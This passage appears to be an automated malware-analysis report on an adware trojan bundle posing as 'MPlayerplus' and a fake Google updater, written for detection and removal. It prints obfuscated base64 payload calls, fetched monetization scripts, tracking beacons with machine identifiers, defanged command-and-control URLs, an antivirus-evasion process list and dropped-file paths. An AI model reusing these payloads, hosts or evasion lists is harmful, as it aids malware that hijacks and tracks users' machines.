    ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNW
    IwZTE1NGM0ZjdmNzM0ZjAyMDIwMDAzMGYwMDJhMTE1ODU3NTI1YzQ2NTc0YTY0NDM1NTVh
    NGQ1MDE4MTAxNjEyMDcwMDE0MTY0ZjQ4NGUyZTQ2MDcwYTEwNTcyNzQxNzg0ZTU1NDQ0Nj
    RjMGExYjE2MDQxYzBiM2YzNzQ0NTQ0MzU3MGQwNDFjMGExYTEzNDgzMTExMDMwMDVjNDU1
    ZTQ1MWM1NzVlNTY0NTVhNTA1MjE1NTU0MzE2MWIwMTE5MTMxZTFhMGIwNzNiMTUxYjAxMW
    MxZTRhNDg0ZTUyM2IzOTJkMzEzYTI5M2UyMDI3MzEyMTM0MzEyNjJkMmUyODNjMmEzMDIw
    MzkzZDM2MzcyNTI0MzYzMTJhNDM0YTRlNDQxNDFlMDkxZDAwMWIwNTBiMGI0NDRmNWE0YT
    JkMzEzNjM2MjkzZDMwMjczMzI5MzczYzJhMjUzNjNlM2MzYjNiMjAzNzMxMmE0MzFiNTU0
    MTdmMDc=', 'zmrnudfncu'); }    ....


    GET /plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405929866"
    Last-Modified: Mon, 21 Jul 2014 08:04:26 GMT
    Cache-Control: max-age=900
    Content-Length: 508
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862437.cds065.am4.c
    appAPI.internal.monetization = appAPI.internal.monetization || {};.if 
    (typeof appAPI.internal.monetization.plugins === "undefined") { appAPI
    .internal.monetization.plugins = {}; }..appAPI.internal.monetization.p
    lugins[226] = function() {..if (appAPI.internal.monetization.loader &&
     appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.
    monetization.getCampaignId) {...if (appAPI.internal.monetization.getCa
    mpaignId() == 0) {....appAPI.internal.monetization.loader.setCampaignI
    d(1026);...}..}.};    ....


    GET /plugins/mins/221.js?ver=4&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1404650838"
    Last-Modified: Sun, 06 Jul 2014 12:47:18 GMT
    Cache-Control: max-age=900
    Content-Length: 413
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862437.cds065.am4.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[221]=fun
    ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
    on.shouldRunByVertical(221,["pops"])){return;}new (appAPI.internal.mon
    etization.plugins.ICMBaseManager({namespace:"DOWNLOADS"}))();};
    ....


    GET /plugins/mins/195.js?ver=28&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1404650834"
    Last-Modified: Sun, 06 Jul 2014 12:47:14 GMT
    Cache-Control: max-age=900
    Content-Length: 408
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds037.am4.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[195]=fun
    ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
    on.shouldRunByVertical(195,["pops"])){return;}new (appAPI.internal.mon
    etization.plugins.ICMBaseManager({namespace:"LITE"}))();};    ....


    GET /plugins/mins/192.js?ver=9&rnd=8467 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:56 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273151"
    Last-Modified: Sun, 17 Aug 2014 10:59:11 GMT
    Cache-Control: max-age=900
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862436.dop013.am4.t,1413862436.cds037.am4.c
    if (typeof setup2 === 'function') { setup2('MTE3YTYzNGMxYzA2MTkwNTNlMT
    QwNjUyNTA0ZTU2MWExOTAxMWI1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFh
    MDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1Mj
    AyMWEwMDAyMWUyMDE5MGE0ODRhNGE0YzFjMDYxOTA1MTg1YzQ1NWYwYjFkMDYwNDQwMTQ0
    NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NW
    ExODFlNTc0NzZjNjM1MjFhMDIwMTE1MDQxYjIyMDI0ODRhNGE1ZjRkNDA0MTdmNGI0NjRh
    NTA0ODE4MTEwMDE5MWMwODA3MDY1MjUwNGUyZjUwMGMxMTE4NDQzNzVjNjA0ZTU0NTI0ZD
    U3MDIwODA2MTkwNDBiM2UyMTRmNGY0YjQ0MWQxOTA0MGExYjA1NDMyYTE5MTAxMDQxNWQ1
    ZTQ0MGE1YzQ1NWI1ZTRhNGQ0YTE1NTQ1NTFkMDAwOTBhMDMwMzAyMGIwNjJkMWUwMDA5MG
    YwZTU3NTA0ZTUzMmQzMjM2MzkyOTM5MjMzODI3MzAzNzNmMmEyZTNlM2UzNTI0MmEzMTM2
    MzIyNjNlMjQzNTM5MmUzMTJiNTU0MTU1NGMwNzBlMTQwNTAwMWExMzAwMTA0YzVjNGE1Nz
    M1MzEzNzIwMjIyNjM4MzQyMzM0MmYzYzJiMzMzZDI1MzQyODJiM2QyZjMxMmI1NTEwNGU0
    OTZjMTc=', 'jpjntrmukf'); }    ....


    GET /plugins/mins/180.js?ver=12&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405846499"
    Last-Modified: Sun, 20 Jul 2014 08:54:59 GMT
    Cache-Control: max-age=630
    Content-Length: 1383
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
    if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMT
    AwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQz
    MWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZj
    M0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEz
    ODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMD
    AwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMx
    NGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OT
    ViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMy
    ZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0Mz
    YyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4
    MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NT
    BkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2Mz
    ODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNG
    YzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVj
    NWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QzYjM5MjkzNTJkMjQyYj
    MxMzg0NDU4NTg1YTE1MTcwYjVlNTM1MTUxNTk1ODVhMDE0NTVlNTg1ZDUwNTA1ODUzNWE1
    MzQ0NTg1ODVjNDExNjBiMDMwODVhMmQzMjJjM2MyODMxM2QzODI1MjMzNzNmMzAyZjM3Mz
    IzMTIzMjgzODJkNGIxYjFiMGUwNjUzMzUzMzI0MjAyMjNjM2QzNTJiMmEyZjNlMzgzYjIz
    M2MzYTI2MmUyMjJmM2UzODI3M2UyYTNjMzgyYjJhMzUzMzQ1NWU2NzY2NGMxNzBlMWIwZD
    A1MDkzYjA5NGQ1NDQ3NTM1NjVhNjYxYQ==', 'njlgrmongb'); }    ....
    <<< skipped >>>

    GET /plugins/mins/102.js?ver=10&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1405241400"
    Last-Modified: Sun, 13 Jul 2014 08:50:00 GMT
    Cache-Control: max-age=900
    Content-Length: 1047
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
    if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMT
    kwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0
    MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYj
    AyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2Mjgy
    MjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2Mm
    UzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4
    MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0Mz
    UwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2Mw
    YTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MW
    YxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5
    MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYz
    MwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIz
    ZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMj
    IyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1
    NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4NjkwZA==', 'usciqzcpvm'); }ont>....


    GET /plugins/mins/91.js?ver=85&rnd=6334 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newdatastatsserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Tue, 21 Oct 2014 03:33:57 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1413792022"
    Last-Modified: Mon, 20 Oct 2014 08:00:22 GMT
    Cache-Control: max-age=586
    Content-Length: 182280
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1413862437.dop013.am4.t,1413862437.cds040.am4.c
    (function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap==
    "string"&&typeof ap.trim=="function"){return ap.trim();}return ap==nul
    l?"":ap.toString().replace(/^\s /,"").replace(/\s $/,"");};function f(
    ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar&
    lt;at;ar  ){aq[ap[ar]]=true;}return aq;}var F=function(ap,aq){var at=[
    ];for(var ar=0;ar<ap.length;ar  ){if(ar in ap){var au=aq(ap[ar],ar,
    ap);if(au!=null){at.push(au);}}}return at;};var ab=function(at,aw,ar){
    var aq,au=0,av=at.length,ap=av===undefined||appAPI.utils.isFunction(at
    );if(ar){if(ap){for(aq in at){if(aw.apply(at[aq],ar)===false){break;}}
    }else{for(;au<av;){if(aw.apply(at[au  ],ar)===false){break;}}}}else
    {if(ap){for(aq in at){if(aw.call(at[aq],aq,at[aq])===false){break;}}}e
    lse{for(;au<av;){if(aw.call(at[au],au,at[au  ])===false){break;}}}}
    return at;};var H=function(ar){ar=ar?(x[ar]||f(ar)):{};var ax=[],ay=[]
    ,at,au,aq,av,aw,aA=function(aB){var aC,aF,aE,aD,aG;for(aC=0,aF=aB.leng
    th;aC<aF;aC  ){aE=aB[aC];aD=appAPI.utils.isArray(aE)?"array":(appAP
    I.utils.isFunction(aE)?"function":"");if(aD==="array"){aA(aE);}else{if
    (aD==="function"){if(!ar.unique||!az.has(aE)){ax.push(aE);}}}}},ap=fun
    ction(aC,aB){aB=aB||[];at=!ar.memory||[aC,aB];au=true;aw=aq||0;aq=0;av
    =ax.length;for(;ax&&aw<av;aw  ){if(ax[aw].apply(aC,aB)===false&&ar.
    stopOnFalse){at=true;break;}}au=false;if(ax){if(!ar.once){if(ay&&ay.le
    ngth){at=ay.shift();az.fireWith(at[0],at[1]);}}else{if(at===true){az.d
    isable();}else{ax=[];}}}},az={add:function(){if(ax){var aB=ax.leng
    <<< skipped >>>
    

    GET /stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940 HTTP/1.1
    Accept: */*
    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: zLFW5JNHHsEzn3gsP6/gWOmvbfdsRf6fkxH80jtB0EM9V3Bc5dmd00PwXCXPANXu
    x-amz-request-id: C4261FADE2887ED2
    Date: Tue, 21 Oct 2014 03:33:55 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:43 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..

    

    GET /apps.gif?action=update&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&subid=0&zdata=0&appver=102&bgver=2&pluginsver=93&curtime=1413862438&lifetime=26&oldappver=33&oldbgver=1&oldpluginsver=27&rnd=793 HTTP/1.1
    Accept: */*
    Host: stats.clientstaticserv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: 41WsFdMcUxxYd8P8u1KxQOL8X SkUplRhAHoeylsnadbFr6Bv/KrZSxPD6ObRUqE
    x-amz-request-id: 1369AB04FE01EB82
    Date: Tue, 21 Oct 2014 03:33:59 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..

    The Trojan connects to the servers at the folowing location(s):

    3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852:

    .text
    `.rdata
    @.data
    .rsrc
    @.reloc
    function not supported
    operation canceled
    address_family_not_supported
    operation_in_progress
    operation_not_supported
    protocol_not_supported
    operation_would_block
    address family not supported
    broken pipe
    inappropriate io control operation
    not supported
    operation in progress
    operation not permitted
    operation not supported
    operation would block
    protocol not supported
    operator
    GetProcessWindowStation
    InternetCrackUrlW
    HttpOpenRequestW
    HttpSendRequestW
    HttpQueryInfoW
    WININET.dll
    KERNEL32.dll
    SHELL32.dll
    ole32.dll
    GetProcessHeap
    GetCPInfo
    <requestedExecutionLevel level='asInvoker' uiAccess='false' />
    0)0>1\1~1
    Amscoree.dll
    - CRT not initialized
    - Attempt to initialize the CRT more than once.
    - floating point support not loaded
    kernel32.dll
    USER32.DLL
    AF2.exe
    AF1.exe
    AF1.exe -d
    C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe
    hXXp://errors.clientstaticserv.com/utility.gif?action=installation&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&app=54246&srcid=001359&error=af&rnd=1413862412&result=

    3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852_rwx_003E0000_00002000:

    SHELL32.DLL
    ShellExecuteA
    KERNEL32.DLL
    .rsrc
    .text

    3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852_rwx_003F0000_00001000:

    |3a2f274a-d35f-47ab-8ca2-11bebfe38097.exeM_852_

    Explorer.EXE_1684_rwx_00EE0000_00002000:

    SHELL32.DLL
    ShellExecuteA
    KERNEL32.DLL
    .rsrc
    .text

    Explorer.EXE_1684_rwx_00EF0000_00001000:

    |explorer.exeM_1684_

    Explorer.EXE_1684_rwx_038D0000_0108E000:

    c:\windows
    hXXp://cades.com.ar/images/logo.gif
    hXXp://ceviztv.com/images/logo.gif
    hXXp://thai-skylight.com/button.gif
    hXXp://coresdabahia.com/images/logo.gif
    hXXp://smokin-tr.com/assets/images/logo.gif
    hXXp://VVV.buergerfest-graefenberg.de/logo.gif
    hXXp://wingmakershope.za.pl/images/button.gif
    hXXp://wellssmall.com/images/logo.gif
    hXXp://VVV.uehsi.de/logo.gif
    hXXp://hotelispb.hop.ru/image/logo.gif
    %System%\drivers\ijlqln.sys
    14067185087
    SHELL32.DLL
    ShellExecuteA
    KERNEL32.DLL
    .rsrc
    .text
    hXXp://89.119.67.154/testo5/
    hXXp://kukutrustnet777.info/home.gif
    hXXp://kukutrustnet888.info/home.gif
    hXXp://kukutrustnet987.info/home.gif
    KERNEL32.dll
    USER32.dll
    h.rdata
    H.data
    .reloc
    ntoskrnl.exe
    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)
    Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
    Software\Microsoft\Windows\CurrentVersion\Internet Settings
    Software\Microsoft\Windows\CurrentVersion
    hXXp://VVV.klkjwre9fqwieluoi.info/
    hXXp://kukutrustnet777888.info/
    Software\Microsoft\Windows\CurrentVersion\policies\system
    Software\Microsoft\Windows\ShellNoRoam\MUICache
    %s:*:Enabled:ipsec
    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    GdiPlus.dll
    hXXp://
    ipfltdrv.sys
    VVV.microsoft.com
    ?%x=%d
    &%x=%d
    SYSTEM.INI
    USER32.DLL
    .%c%s
    \\.\amsint32
    NTDLL.DLL
    autorun.inf
    ADVAPI32.DLL
    win%s.exe
    %s.exe
    WININET.DLL
    InternetOpenUrlA
    avast! Web Scanner
    Avira AntiVir Premium WebGuard
    cmdGuard
    cmdAgent
    Eset HTTP Server
    ProtoPort Firewall service
    SpIDer FS Monitor for Windows NT
    Symantec Password Validation
    WebrootDesktopFirewallDataService
    WebrootFirewall
    %d%d.tmp
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
    %s\%s
    %s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
    Software\Microsoft\Windows\CurrentVersion\Ext\Stats
    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
    Explorer.exe
    A2CMD.
    ASHWEBSV.
    AVGCC.AVGCHSVX.
    DRWEB
    DWEBLLIO
    DWEBIO
    FSGUIEXE.
    MCVSSHLD.
    NPFMSG.
    SYMSPORT.
    WEBSCANX.
    .adata
    M_%d_
    %c%d_%d
    ?456789:;<=
    !"#$%&'()* ,-./0123
    GetProcessHeap
    GetWindowsDirectoryA
    RegEnumKeyExA
    RegDeleteKeyA
    RegOpenKeyExA
    RegCreateKeyA
    RegCloseKey
    SHFileOperationA
    &3&3&3&389
    .rdata
    .data
    Bkrnl.exe?
    = =$=(=,=
    322%2`.50728)
    .klkjw:9fqwi
    FamXf39.sys
    .pBTa8
    %s:*:
    Bg.laXV
    &?%x=
    GUrlA'
    Web%w|nc
    HTTP)
    2GUARDCMD.
    .ENHCDM
    PL/KPCKwWEB
    MM.PFW.
    .bssf
    J:CRT
    ADVAPI32.dll
    MSVCRT.dll
    SHELL32.dll
    WS2_32.dll


    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      GoogleUpdate.exe:2460
      GoogleUpdate.exe:756
      GoogleUpdate.exe:2652
      GoogleUpdate.exe:2296
      GoogleUpdate.exe:1288
      GoogleUpdate.exe:2364
      GoogleUpdate.exe:2356
      772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540
      Iufkopcpdfjpcg.exe:424
      MPlayerplus_01-bg.exe:2776
      772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112
      %original file name%.exe:688
      regsvr32.exe:2736
      dwwin.exe:3088
      MPlayerplus_01-codedownloader.exe:2344
      MPlayerplus_01-codedownloader.exe:2224
      772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848

    2. Delete the original Trojan file.
    3. Delete or disinfect the following files created/modified by the Trojan:

      %Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (54 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (898 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
      %WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (894 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (56 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\TarC.tmp (2784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (2712 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (32 bytes)
      %Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (56 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
      %Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (352077 bytes)
      %Program Files%\MPlayerplus_01\MPlayerplus_01-bg.exe (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsisos.dll (5 bytes)
      %Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll (3361 bytes)
      %Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-4.exe (5873 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\21.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\1.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\182.js (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\45.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\extension.js (734 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\102.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\253.js (769 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\7.js (685 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\39.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\36.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\40.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\2.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\4.js (3312 bytes)
      %Program Files%\MPlayerplus_01\MPlayerplus_01-codedownloader.exe (3073 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\252c_appcompat.txt (4124 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\247798 (258822 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\191.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\78.js (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\43.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\3.js (63 bytes)
